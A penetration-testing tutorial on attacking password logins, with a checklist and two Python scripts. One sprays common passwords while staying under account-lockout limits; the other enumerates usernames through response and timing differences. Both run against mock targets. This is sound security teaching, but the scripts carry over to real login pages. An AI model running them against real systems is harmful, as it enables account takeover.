
# Attacking password-based authentication

## What is it?

Password-based authentication generally lets a user register an account and choose a password, or sometimes an account (and an initial password) is assigned to them by an administrator. It is commonly susceptible to brute-force and password-spraying attacks, credential stuffing (replaying username/password pairs leaked from other sites), and abuse of account-lockout mechanisms to lock legitimate users out.

**A simple example**

* A vulnerable web application allows users to sign up and set a password.
* After 10 failed login attempts, an account is locked.
* If an attacker tries 9 common passwords against many user accounts (password spraying), every account stays just under the lockout threshold, and the attacker gains access to any account whose owner chose one of those passwords.
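The spraying scenario above, worked through as an added example that is not part of the original page. The target is a constructed in-memory stand-in (`MockTarget`, with made-up users and passwords) for a login endpoint that locks an account after a fixed number of failures; the spray keeps every account one attempt below that threshold. Against a real system `target.login` would be an HTTP request, and you would run this only with authorisation.

```python
"""Password spraying that stays under the target's account-lockout threshold.

Added example (not from the original page). `MockTarget` is a constructed
in-memory stand-in for a login endpoint that locks an account after
`lockout_threshold` failed attempts. Against a real target you would replace
`target.login` with an HTTP request and only run this with authorisation.
"""
from collections import defaultdict

# Constructed user base for the simulation: several users chose weak passwords.
CONSTRUCTED_USERS = {
    "alice": "Password1",
    "bob": "Welcome1",
    "carol": "Spring2024!",   # not in the spray list, so never guessed
    "dave": "hunter2",
}

# A short list of common passwords; 9 entries fits under a lockout of 10.
COMMON_PASSWORDS = [
    "Password1", "Welcome1", "123456", "Summer2024", "qwerty",
    "hunter2", "letmein", "Password123", "admin",
]


class MockTarget:
    """Simulated login endpoint with a simple failed-attempt lockout."""

    def __init__(self, users, lockout_threshold=10):
        self.users = users
        self.lockout_threshold = lockout_threshold
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, username, password):
        """Return 'ok', 'fail' or 'locked', like a real endpoint's responses."""
        if username in self.locked:
            return "locked"
        if self.users.get(username) == password:
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= self.lockout_threshold:
            self.locked.add(username)
            return "locked"
        return "fail"


def spray(login, usernames, passwords, lockout_threshold):
    """Spray `passwords` across `usernames` with at most lockout_threshold - 1
    attempts per account, so no account is ever locked.

    Iterates password-first (one password across every user before moving to
    the next) rather than user-first, which is how a real spray spreads
    attempts out over time and across accounts. `login(user, pw)` must return
    'ok', 'fail' or 'locked'.

    Returns (found, attempts): found maps username -> guessed password.
    """
    budget = lockout_threshold - 1
    attempts_per_user = defaultdict(int)
    found = {}
    attempts = 0
    for password in passwords[:budget]:
        for user in usernames:
            if user in found or attempts_per_user[user] >= budget:
                continue
            attempts_per_user[user] += 1
            attempts += 1
            result = login(user, password)
            if result == "ok":
                found[user] = password
            elif result == "locked":
                # Defensive: the budget should prevent this; stop touching the account.
                attempts_per_user[user] = budget
    return found, attempts


def run_demo():
    """Spray the constructed target; report compromised and locked accounts."""
    target = MockTarget(CONSTRUCTED_USERS, lockout_threshold=10)
    usernames = list(CONSTRUCTED_USERS) + ["erin"]  # erin does not exist
    found, attempts = spray(target.login, usernames, COMMON_PASSWORDS,
                            target.lockout_threshold)
    return found, attempts, sorted(target.locked)


if __name__ == "__main__":
    found, attempts, locked = run_demo()
    print(f"{attempts} attempts, compromised: {found}, locked: {locked}")
```

The per-account budget is the whole trick: the lockout counter is what limits you, not the total number of requests, so the same 9 guesses can be tried against thousands of accounts without tripping it. Real lockout counters often reset after a time window, which is why a real spray also spaces its passes out over hours or days rather than running them back to back.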

Broken authentication can often lead to:

* Account takeover
* Sensitive data exposure

**Other learning resources:**

* PortSwigger: <https://portswigger.net/web-security/authentication>

**Writeups:**

*Have a good writeup & want to share it here? Drop me a message on LinkedIn.*

## Checklist

* [ ] Can we enumerate user accounts?
  * [ ] Registration page
  * [ ] Login page
  * [ ] Password reset page
* [ ] Is there any brute-force protection?
  * [ ] Check for account lockouts
  * [ ] Check for rate limiting
  * [ ] Check for CAPTCHA
  * [ ] Check for MFA
* [ ] What is the password policy?
  * [ ] Check the strength requirements
  * [ ] Is the password stored securely? (E.g. if we use the reset or "forgot password" flow, does it send us our existing cleartext password, which means it is stored reversibly)
  * [ ] Is the password reset token long and unpredictable?
* [ ] Are credentials predictable?
  * [ ] Check for default credentials
  * [ ] Check for username conventions (E.g. firstname.lastname)
* [ ] Is autocomplete enabled on password fields?
* [ ] Check the password reset functionality
  * [ ] Knowledge-based questions
  * [ ] Token leakage via the Referer header (E.g. the reset page loads third-party resources or links out while the token is in the URL)
  * [ ] Token predictability
* [ ] Is authentication happening client-side?
* [ ] Are there any backups or leaked files with creds?
* [ ] Is there "remember me" or auto-login functionality?
  * [ ] Are the tokens for this predictable?
  * [ ] How long does the token remain valid?
* [ ] Are tokens or credentials passed via the URL?
* [ ] Are there CSRF tokens?
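The first checklist item, enumerating user accounts, worked through as an added example that is not part of the original page. `mock_send` is a constructed stand-in for submitting the login form with a candidate username and a wrong password; the usernames, messages and timings are made up to show three enumeration oracles at once (a different error message, a per-request CSRF token that must be normalised away before diffing, and a timing difference where the server only runs its slow password hash for accounts that exist). Against a real target `send` would be an HTTP POST, run only with authorisation.

```python
"""Username enumeration by diffing login responses against a known-bad baseline.

Added example (not from the original page). `mock_send` is a constructed
stand-in for submitting a login form with a username and a wrong password;
against a real target it would be an HTTP POST, run only with authorisation.
The usernames and response texts below are made up for the simulation.
"""
import hashlib
import re
import statistics
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    body: str
    elapsed_ms: float


# Constructed target behaviour (three enumeration oracles in one):
# - existing users get a different error message ("Incorrect password"),
# - "carol" gets the uniform message but the server still runs the slow hash,
# - unknown users get the uniform message and an early return (fast).
_EXISTS_DIFFERENT_MESSAGE = {"alice", "bob"}
_EXISTS_TIMING_ONLY = {"carol"}
_UNIFORM_MSG = "Invalid username or password"


def mock_send(username: str) -> Response:
    # Per-request CSRF token: noise that must be normalised away before diffing.
    token = hashlib.sha256(username.encode()).hexdigest()[:16]
    prefix = f'<input type="hidden" name="csrf" value="{token}">'
    if username in _EXISTS_DIFFERENT_MESSAGE:
        return Response(200, prefix + "Incorrect password", 410.0)
    if username in _EXISTS_TIMING_ONLY:
        return Response(200, prefix + _UNIFORM_MSG, 405.0)
    return Response(200, prefix + _UNIFORM_MSG, 28.0)


def fingerprint(resp: Response):
    """Reduce a response to what should be identical for every unknown user."""
    body = re.sub(r'name="csrf"\s+value="[^"]*"', 'name="csrf" value="X"', resp.body)
    return (resp.status, len(body), body)


def enumerate_users(candidates, baseline_names, send, timing_tolerance_ms=150.0):
    """Flag candidates whose login response differs from known-nonexistent names.

    baseline_names must be usernames that certainly do not exist (random
    strings). Returns {username: [reasons]} for every candidate that differs
    in status/body or in response time beyond timing_tolerance_ms.
    """
    baseline = [send(name) for name in baseline_names]
    baseline_fps = {fingerprint(r) for r in baseline}
    baseline_ms = statistics.median(r.elapsed_ms for r in baseline)
    hits = {}
    for name in candidates:
        resp = send(name)
        reasons = []
        if fingerprint(resp) not in baseline_fps:
            reasons.append("response differs from baseline")
        if abs(resp.elapsed_ms - baseline_ms) > timing_tolerance_ms:
            reasons.append(f"timing {resp.elapsed_ms:.0f}ms vs baseline {baseline_ms:.0f}ms")
        if reasons:
            hits[name] = reasons
    return hits


def run_demo():
    baseline = ["zz_nosuchuser_4f1c", "zz_nosuchuser_9a2e"]  # constructed
    candidates = ["alice", "bob", "carol", "dave"]  # constructed
    return enumerate_users(candidates, baseline, mock_send)


if __name__ == "__main__":
    for user, reasons in run_demo().items():
        print(f"{user}: likely exists ({'; '.join(reasons)})")
```

Always diff against a baseline of usernames you know do not exist rather than against each other, so that per-request noise (CSRF tokens, timestamps, request IDs) can be identified and stripped first; anything left that differs is the oracle. Timing measured from a single request is noisy on a real network, so repeat each candidate several times and compare medians before treating a timing gap as evidence. The same approach applies to the registration ("username already taken") and password-reset ("we have sent you an email") pages in the checklist.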
